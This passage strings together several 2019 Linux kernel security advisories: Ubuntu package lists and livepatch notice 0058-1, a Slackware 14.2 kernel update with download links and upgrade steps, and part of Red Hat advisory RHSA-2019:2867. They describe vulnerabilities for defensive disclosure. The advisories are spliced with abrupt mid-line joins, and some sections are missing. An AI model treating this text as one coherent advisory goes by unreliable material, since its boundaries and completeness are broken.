4.15.0-1056.65\n  linux-image-4.15.0-1064-snapdragon  4.15.0-1064.71\n  linux-image-4.15.0-64-generic   4.15.0-64.73\n  linux-image-4.15.0-64-generic-lpae  4.15.0-64.73\n  linux-image-4.15.0-64-lowlatency  4.15.0-64.73\n  linux-image-5.0.0-1017-gke      5.0.0-1017.17~18.04.1\n  linux-image-5.0.0-1020-azure    5.0.0-1020.21~18.04.1\n  linux-image-5.0.0-29-generic    5.0.0-29.31~18.04.1\n  linux-image-5.0.0-29-generic-lpae  5.0.0-29.31~18.04.1\n  linux-image-5.0.0-29-lowlatency  5.0.0-29.31~18.04.1\n  linux-image-aws                 4.15.0.1050.49\n  linux-image-azure               5.0.0.1020.30\n  linux-image-gcp                 4.15.0.1044.70\n  linux-image-generic             4.15.0.64.66\n  linux-image-generic-hwe-18.04   5.0.0.29.86\n  linux-image-generic-lpae        4.15.0.64.66\n  linux-image-generic-lpae-hwe-18.04  5.0.0.29.86\n  linux-image-gke                 4.15.0.1044.47\n  linux-image-gke-4.15            4.15.0.1044.47\n  linux-image-gke-5.0             5.0.0.1017.7\n  linux-image-kvm                 4.15.0.1046.46\n  linux-image-lowlatency          4.15.0.64.66\n  linux-image-lowlatency-hwe-18.04  5.0.0.29.86\n  linux-image-oem                 4.15.0.1056.60\n  linux-image-oracle              4.15.0.1025.28\n  linux-image-powerpc-e500mc      4.15.0.64.66\n  linux-image-powerpc-smp         4.15.0.64.66\n  linux-image-powerpc64-emb       4.15.0.64.66\n  linux-image-powerpc64-smp       4.15.0.64.66\n  linux-image-raspi2              4.15.0.1047.45\n  linux-image-snapdragon          4.15.0.1064.67\n  linux-image-snapdragon-hwe-18.04  5.0.0.29.86\n  linux-image-virtual             4.15.0.64.66\n  linux-image-virtual-hwe-18.04   5.0.0.29.86\n\nUbuntu 16.04 LTS:\n  linux-image-4.15.0-1025-oracle  4.15.0-1025.28~16.04.1\n  linux-image-4.15.0-1044-gcp     4.15.0-1044.46\n  linux-image-4.15.0-1050-aws     4.15.0-1050.52~16.04.1\n  linux-image-4.15.0-1059-azure   4.15.0-1059.64\n  linux-image-4.15.0-64-generic   4.15.0-64.73~16.04.1\n  linux-image-4.15.0-64-generic-lpae  4.15.0-64.73~16.04.1\n  linux-image-4.15.0-64-lowlatency  4.15.0-64.73~16.04.1\n  linux-image-4.4.0-1058-kvm      4.4.0-1058.65\n  linux-image-4.4.0-1094-aws      4.4.0-1094.105\n  linux-image-4.4.0-1122-raspi2   4.4.0-1122.131\n  linux-image-4.4.0-1126-snapdragon  4.4.0-1126.132\n  linux-image-4.4.0-164-generic   4.4.0-164.192\n  linux-image-4.4.0-164-generic-lpae  4.4.0-164.192\n  linux-image-4.4.0-164-lowlatency  4.4.0-164.192\n  linux-image-4.4.0-164-powerpc-e500mc  4.4.0-164.192\n  linux-image-4.4.0-164-powerpc-smp  4.4.0-164.192\n  linux-image-4.4.0-164-powerpc64-emb  4.4.0-164.192\n  linux-image-4.4.0-164-powerpc64-smp  4.4.0-164.192\n  linux-image-aws                 4.4.0.1094.98\n  linux-image-aws-hwe             4.15.0.1050.50\n  linux-image-azure               4.15.0.1059.62\n  linux-image-gcp                 4.15.0.1044.58\n  linux-image-generic             4.4.0.164.172\n  linux-image-generic-hwe-16.04   4.15.0.64.84\n  linux-image-generic-lpae        4.4.0.164.172\n  linux-image-generic-lpae-hwe-16.04  4.15.0.64.84\n  linux-image-gke                 4.15.0.1044.58\n  linux-image-kvm                 4.4.0.1058.58\n  linux-image-lowlatency          4.4.0.164.172\n  linux-image-lowlatency-hwe-16.04  4.15.0.64.84\n  linux-image-oem                 4.15.0.64.84\n  linux-image-oracle              4.15.0.1025.18\n  linux-image-powerpc-e500mc      4.4.0.164.172\n  linux-image-powerpc-smp         4.4.0.164.172\n  linux-image-powerpc64-emb       4.4.0.164.172\n  linux-image-powerpc64-smp       4.4.0.164.172\n  linux-image-raspi2              4.4.0.1122.122\n  linux-image-snapdragon          4.4.0.1126.118\n  linux-image-virtual             4.4.0.164.172\n  linux-image-virtual-hwe-16.04   4.15.0.64.84\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. ==========================================================================\nKernel Live Patch Security Notice 0058-1\nOctober 22, 2019\n\nlinux vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu:\n\n| Series           | Base kernel  | Arch     | flavors          |\n|------------------+--------------+----------+------------------|\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | aws              |\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | generic          |\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | lowlatency       |\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | oem              |\n| Ubuntu 18.04 LTS | 5.0.0        | amd64    | azure            |\n| Ubuntu 14.04 LTS | 4.4.0        | amd64    | generic          |\n| Ubuntu 14.04 LTS | 4.4.0        | amd64    | lowlatency       |\n| Ubuntu 16.04 LTS | 4.4.0        | amd64    | aws              |\n| Ubuntu 16.04 LTS | 4.4.0        | amd64    | generic          |\n| Ubuntu 16.04 LTS | 4.4.0        | amd64    | lowlatency       |\n| Ubuntu 16.04 LTS | 4.15.0       | amd64    | azure            |\n| Ubuntu 16.04 LTS | 4.15.0       | amd64    | generic          |\n| Ubuntu 16.04 LTS | 4.15.0       | amd64    | lowlatency       |\n\nSummary:\n\nSeveral security issues were fixed in the kernel. \n\nSoftware Description:\n- linux: Linux kernel\n\nDetails:\n\nIt was discovered that a race condition existed in the GFS2 file system in\nthe Linux kernel. A local attacker could possibly use this to cause a\ndenial of service (system crash). (CVE-2016-10905)\n\nIt was discovered that a use-after-free error existed in the block layer\nsubsystem of the Linux kernel when certain failure conditions occurred. A\nlocal attacker could possibly use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2018-20856)\n\nIt was discovered that the USB gadget Midi driver in the Linux kernel\ncontained a double-free vulnerability when handling certain error\nconditions. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2018-20961)\n\nIt was discovered that the XFS file system in the Linux kernel did not\nproperly handle mount failures in some situations. A local attacker could\npossibly use this to cause a denial of service (system crash) or execute\narbitrary code. (CVE-2018-20976)\n\nIt was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not\ndid not handle detach operations correctly, leading to a use-after-free\nvulnerability. A physically proximate attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2018-21008)\n\nIt was discovered that the Intel Wi-Fi device driver in the Linux kernel\ndid not properly validate certain Tunneled Direct Link Setup (TDLS). A\nphysically proximate attacker could use this to cause a denial of service\n(Wi-Fi disconnect). (CVE-2019-0136)\n\nIt was discovered that the Linux kernel on ARM processors allowed a tracing\nprocess to modify a syscall after a seccomp decision had been made on that\nsyscall. A local attacker could possibly use this to bypass seccomp\nrestrictions. (CVE-2019-2054)\n\nIt was discovered that an integer overflow existed in the Binder\nimplementation of the Linux kernel, leading to a buffer overflow. A local\nattacker could use this to escalate privileges. (CVE-2019-2181)\n\nIt was discovered that the Marvell Wireless LAN device driver in the Linux\nkernel did not properly validate the BSS descriptor. A local attacker could\npossibly use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-3846)\n\nIt was discovered that a heap buffer overflow existed in the Marvell\nWireless LAN device driver for the Linux kernel. An attacker could use this\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-10126)\n\nIt was discovered that the Bluetooth UART implementation in the Linux\nkernel did not properly check for missing tty operations. A local attacker\ncould use this to cause a denial of service. (CVE-2019-10207)\n\nJonathan Looney discovered that an integer overflow existed in the Linux\nkernel when handling TCP Selective Acknowledgments (SACKs). A remote\nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-11477)\n\nJonathan Looney discovered that the TCP retransmission queue implementation\nin the Linux kernel could be fragmented when handling certain TCP Selective\nAcknowledgment (SACK) sequences. A remote attacker could use this to cause\na denial of service. (CVE-2019-11478)\n\nIt was discovered that the ext4 file system implementation in the Linux\nkernel did not properly zero out memory in some situations. A local\nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2019-11833)\n\nIt was discovered that the PowerPC dlpar implementation in the Linux kernel\ndid not properly check for allocation errors in some situations. A local\nattacker could possibly use this to cause a denial of service (system\ncrash). (CVE-2019-12614)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate meta data, leading to a buffer overread. A local attacker\ncould use this to cause a denial of service (system crash). \n(CVE-2019-14283)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate ioctl() calls, leading to a division-by-zero. A local\nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-14284)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-14814)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-14815)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-14816)\n\nMatt Delco discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly perform bounds checking when handling coalesced\nMMIO write operations. A local attacker with write access to /dev/kvm could\nuse this to cause a denial of service (system crash). (CVE-2019-14821)\n\nPeter Pi discovered a buffer overflow in the virtio network backend\n(vhost_net) implementation in the Linux kernel. (CVE-2019-14835)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your livepatches to the following\nversions:\n\n| Kernel                   | Version  | flavors                  |\n|--------------------------+----------+--------------------------|\n| 4.4.0-148.174            | 58.1     | lowlatency, generic      |\n| 4.4.0-148.174~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-150.176            | 58.1     | generic, lowlatency      |\n| 4.4.0-150.176~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-151.178            | 58.1     | lowlatency, generic      |\n| 4.4.0-151.178~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-154.181            | 58.1     | lowlatency, generic      |\n| 4.4.0-154.181~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-157.185            | 58.1     | lowlatency, generic      |\n| 4.4.0-157.185~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-159.187            | 58.1     | lowlatency, generic      |\n| 4.4.0-159.187~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-161.189            | 58.1     | lowlatency, generic      |\n| 4.4.0-161.189~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-164.192            | 58.1     | lowlatency, generic      |\n| 4.4.0-164.192~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-165.193            | 58.1     | generic, lowlatency      |\n| 4.4.0-1083.93            | 58.1     | aws                      |\n| 4.4.0-1084.94            | 58.1     | aws                      |\n| 4.4.0-1085.96            | 58.1     | aws                      |\n| 4.4.0-1087.98            | 58.1     | aws                      |\n| 4.4.0-1088.99            | 58.1     | aws                      |\n| 4.4.0-1090.101           | 58.1     | aws                      |\n| 4.4.0-1092.103           | 58.1     | aws                      |\n| 4.4.0-1094.105           | 58.1     | aws                      |\n| 4.15.0-50.54             | 58.1     | generic, lowlatency      |\n| 4.15.0-50.54~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-51.55             | 58.1     | generic, lowlatency      |\n| 4.15.0-51.55~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-52.56             | 58.1     | lowlatency, generic      |\n| 4.15.0-52.56~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-54.58             | 58.1     | generic, lowlatency      |\n| 4.15.0-54.58~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-55.60             | 58.1     | generic, lowlatency      |\n| 4.15.0-58.64             | 58.1     | generic, lowlatency      |\n| 4.15.0-58.64~16.04.1     | 58.1     | lowlatency, generic      |\n| 4.15.0-60.67             | 58.1     | lowlatency, generic      |\n| 4.15.0-60.67~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-62.69             | 58.1     | generic, lowlatency      |\n| 4.15.0-62.69~16.04.1     | 58.1     | lowlatency, generic      |\n| 4.15.0-64.73             | 58.1     | generic, lowlatency      |\n| 4.15.0-64.73~16.04.1     | 58.1     | lowlatency, generic      |\n| 4.15.0-65.74             | 58.1     | lowlatency, generic      |\n| 4.15.0-1038.43           | 58.1     | oem                      |\n| 4.15.0-1039.41           | 58.1     | aws                      |\n| 4.15.0-1039.44           | 58.1     | oem                      |\n| 4.15.0-1040.42           | 58.1     | aws                      |\n| 4.15.0-1041.43           | 58.1     | aws                      |\n| 4.15.0-1043.45           | 58.1     | aws                      |\n| 4.15.0-1043.48           | 58.1     | oem                      |\n| 4.15.0-1044.46           | 58.1     | aws                      |\n| 4.15.0-1045.47           | 58.1     | aws                      |\n| 4.15.0-1045.50           | 58.1     | oem                      |\n| 4.15.0-1047.49           | 58.1     | aws                      |\n| 4.15.0-1047.51           | 58.1     | azure                    |\n| 4.15.0-1048.50           | 58.1     | aws                      |\n| 4.15.0-1049.54           | 58.1     | azure                    |\n| 4.15.0-1050.52           | 58.1     | aws                      |\n| 4.15.0-1050.55           | 58.1     | azure                    |\n| 4.15.0-1050.57           | 58.1     | oem                      |\n| 4.15.0-1051.53           | 58.1     | aws                      |\n| 4.15.0-1051.56           | 58.1     | azure                    |\n| 4.15.0-1052.57           | 58.1     | azure                    |\n| 4.15.0-1055.60           | 58.1     | azure                    |\n| 4.15.0-1056.61           | 58.1     | azure                    |\n| 4.15.0-1056.65           | 58.1     | oem                      |\n| 4.15.0-1057.62           | 58.1     | azure                    |\n| 4.15.0-1057.66           | 58.1     | oem                      |\n| 4.15.0-1059.64           | 58.1     | azure                    |\n| 5.0.0-1014.14~18.04.1    | 58.1     | azure                    |\n| 5.0.0-1016.17~18.04.1    | 58.1     | azure                    |\n| 5.0.0-1018.19~18.04.1    | 58.1     | azure                    |\n| 5.0.0-1020.21~18.04.1    | 58.1     | azure                    |\n\nSupport Information:\n\nKernels older than the levels listed below do not receive livepatch\nupdates. Please upgrade your kernel as soon as possible. \n\n| Series           | Version          | Flavors                  |\n|------------------+------------------+--------------------------|\n| Ubuntu 18.04 LTS | 4.15.0-1039      | aws                      |\n| Ubuntu 16.04 LTS | 4.4.0-1083       | aws                      |\n| Ubuntu 18.04 LTS | 5.0.0-1000       | azure                    |\n| Ubuntu 16.04 LTS | 4.15.0-1047      | azure                    |\n| Ubuntu 18.04 LTS | 4.15.0-50        | generic lowlatency       |\n| Ubuntu 16.04 LTS | 4.15.0-50        | generic lowlatency       |\n| Ubuntu 14.04 LTS | 4.4.0-148        | generic lowlatency       |\n| Ubuntu 18.04 LTS | 4.15.0-1038      | oem                      |\n| Ubuntu 16.04 LTS | 4.4.0-148        | generic lowlatency       |\n\nReferences:\n  CVE-2016-10905, CVE-2018-20856, CVE-2018-20961, CVE-2018-20976, \n  CVE-2018-21008, CVE-2019-0136, CVE-2019-2054, CVE-2019-2181, \n  CVE-2019-3846, CVE-2019-10126, CVE-2019-10207, CVE-2019-11477, \n  CVE-2019-11478, CVE-2019-11833, CVE-2019-12614, CVE-2019-14283, \n  CVE-2019-14284, CVE-2019-14814, CVE-2019-14815, CVE-2019-14816, \n  CVE-2019-14821, CVE-2019-14835\n\n\n-- \nubuntu-security-announce mailing list\nubuntu-security-announce@lists.ubuntu.com\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\n. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/linux-4.4.199/*:  Upgraded. \n  These updates fix various bugs and security issues. \n  If you use lilo to boot your machine, be sure lilo.conf points to the correct\n  kernel and initrd and run lilo as root to update the bootloader. \n  If you use elilo to boot your machine, you should run eliloconfig to copy the\n  kernel and initrd to the EFI System Partition. \n  For more information, see:\n    Fixed in 4.4.191:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3900\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15118\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10906\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10905\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10638\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15117\n    Fixed in 4.4.193:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14835\n    Fixed in 4.4.194:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14816\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14814\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15505\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14821\n    Fixed in 4.4.195:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17053\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17052\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17056\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17055\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17054\n    Fixed in 4.4.196:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2215\n    Fixed in 4.4.197:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16746\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20976\n    Fixed in 4.4.198:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17075\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17133\n    Fixed in 4.4.199:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15098\n  (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project!  :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-smp-4.4.199_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199_smp-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-smp-4.4.199_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-smp-4.4.199_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199_smp-noarch-1.txz\n\nUpdated packages for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199-noarch-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.2 packages:\n\n0e523f42e759ecc2399f36e37672f110  kernel-generic-4.4.199-i586-1.txz\nee6451f5362008b46fee2e08e3077b21  kernel-generic-smp-4.4.199_smp-i686-1.txz\na8338ef88f2e3ea9c74d564c36ccd420  kernel-headers-4.4.199_smp-x86-1.txz\ncd9e9c241e4eec2fba1dae658a28870e  kernel-huge-4.4.199-i586-1.txz\n842030890a424023817d42a83a86a7f4  kernel-huge-smp-4.4.199_smp-i686-1.txz\n257db024bb4501548ac9118dbd2d9ae6  kernel-modules-4.4.199-i586-1.txz\n96377cbaf7bca55aaca70358c63151a7  kernel-modules-smp-4.4.199_smp-i686-1.txz\n0673e86466f9e624964d95107cf6712f  kernel-source-4.4.199_smp-noarch-1.txz\n\nSlackware x86_64 14.2 packages:\n6d1ff428e7cad6caa8860acc402447a1  kernel-generic-4.4.199-x86_64-1.txz\ndadc091dc725b8227e0d1e35098d6416  kernel-headers-4.4.199-x86-1.txz\nf5f4c034203f44dd1513ad3504c42515  kernel-huge-4.4.199-x86_64-1.txz\na5337cd8b2ca80d4d93b9e9688e42b03  kernel-modules-4.4.199-x86_64-1.txz\n5dd6e46c04f37b97062dc9e52cc38add  kernel-source-4.4.199-noarch-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg kernel-*.txz\n\nIf you are using an initrd, you\u0027ll need to rebuild it. \n\nFor a 32-bit SMP machine, use this command (substitute the appropriate\nkernel version if you are not running Slackware 14.2):\n# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199-smp | bash\n\nFor a 64-bit machine, or a 32-bit uniprocessor machine, use this command\n(substitute the appropriate kernel version if you are not running\nSlackware 14.2):\n# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199 | bash\n\nPlease note that \"uniprocessor\" has to do with the kernel you are running,\nnot with the CPU. Most systems should run the SMP kernel (if they can)\nregardless of the number of cores the CPU has. If you aren\u0027t sure which\nkernel you are running, run \"uname -a\". If you see SMP there, you are\nrunning the SMP kernel and should use the 4.4.199-smp version when running\nmkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit\nsystems should always use 4.4.199 as the version. \n\nIf you are using lilo or elilo to boot the machine, you\u0027ll need to ensure\nthat the machine is properly prepared before rebooting. \n\nIf using LILO:\nBy default, lilo.conf contains an image= line that references a symlink\nthat always points to the correct kernel. No editing should be required\nunless your machine uses a custom lilo.conf. If that is the case, be sure\nthat the image= line references the correct kernel file.  Either way,\nyou\u0027ll need to run \"lilo\" as root to reinstall the boot loader. \n\nIf using elilo:\nEnsure that the /boot/vmlinuz symlink is pointing to the kernel you wish\nto use, and then run eliloconfig to update the EFI System Partition. \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list:                          |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message:                                                     |\n|                                                                        |\n|   unsubscribe slackware-security                                       |\n|                                                                        |\n| You will get a confirmation message back containing instructions to    |\n| complete the process.  Please do not reply to this email address. 7) - aarch64, noarch, ppc64le\n\n3. These packages include redhat-release-virtualization-host,\novirt-node, and rhev-hypervisor. RHVH features a Cockpit user\ninterface for monitoring the host\u0027s resources and performing administrative\ntasks. \n\nThe following packages have been upgraded to a later upstream version:\nredhat-release-virtualization-host (4.2), redhat-virtualization-host (4.2). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: kernel security update\nAdvisory ID:       RHSA-2019:2867-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2019:2867\nIssue date:        2019-09-23\nCVE Names:         CVE-2019-14835\n====================================================================\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.4\nAdvanced Update Support, Red Hat Enterprise Linux 7.4 Telco Extended Update\nSupport, and Red Hat Enterprise Linux 7.4 Update Services for SAP\nSolutions. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Server AUS (v. 7.4) - noarch, x86_64\nRed Hat Enterprise Linux Server E4S (v. 7.4) - noarch, ppc64le, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 7.4) - x86_64\nRed Hat Enterprise Linux Server Optional E4S (v. 7.4) - ppc64le, x86_64\nRed Hat Enterprise Linux Server Optional TUS (v. 7.4) - x86_64\nRed Hat Enterprise Linux Server TUS (v. 7.4) - noarch, x86_64\n\n3. \n(CVE-2019-14835)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1750727 - CVE-2019-14835 kernel: vhost-net: guest to host kernel escape during migration\n\n6. Package List:\n\nRed Hat Enterprise Linux Server AUS (v. 7.4):\n\nSource:\nkernel-3.10.0-693.59.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-693.59.1.el7.noarch.rpm\nkernel-doc-3.10.0-693.59.1.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debug-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-devel-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-headers-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-tools-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-693.59.1.el7.x86_64.rpm\nperf-3.10.0-693.59.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\npython-perf-3.10.0-693.59.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server E4S (v. 7.4):\n\nSource:\nkernel-3.10.0-693.59.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-693.59.1.el7.noarch.rpm\nkernel-doc-3.10.0-693.59.1.el7.noarch.rpm\n\nppc64le:\nkernel-3.10.0-693.59.1.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-693.59.1.el7.ppc64le.rpm\nkernel-debug-3.10.0-693.59.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-693.59.1.el7.ppc64le.rpm\nkernel-devel-3.10.0-693.59.1.el7.ppc64le.rpm\nkernel-headers-3.10.0-693.59.1.el7.ppc64le.rpm\nkernel-tools-3.10.0-693.59.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-693.59.1.el7.ppc64le.rpm\nperf-3.10.0-693.59.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm\npython-perf-3.10.0-693.59.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm\n\nx86_64:\nkernel-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debug-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-devel-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-headers-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-tools-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-693.59.1.el7.x86_64.rpm\nperf-3.10.0-693.59.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\npython-perf-3.10.0-693.59.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server TUS (v. 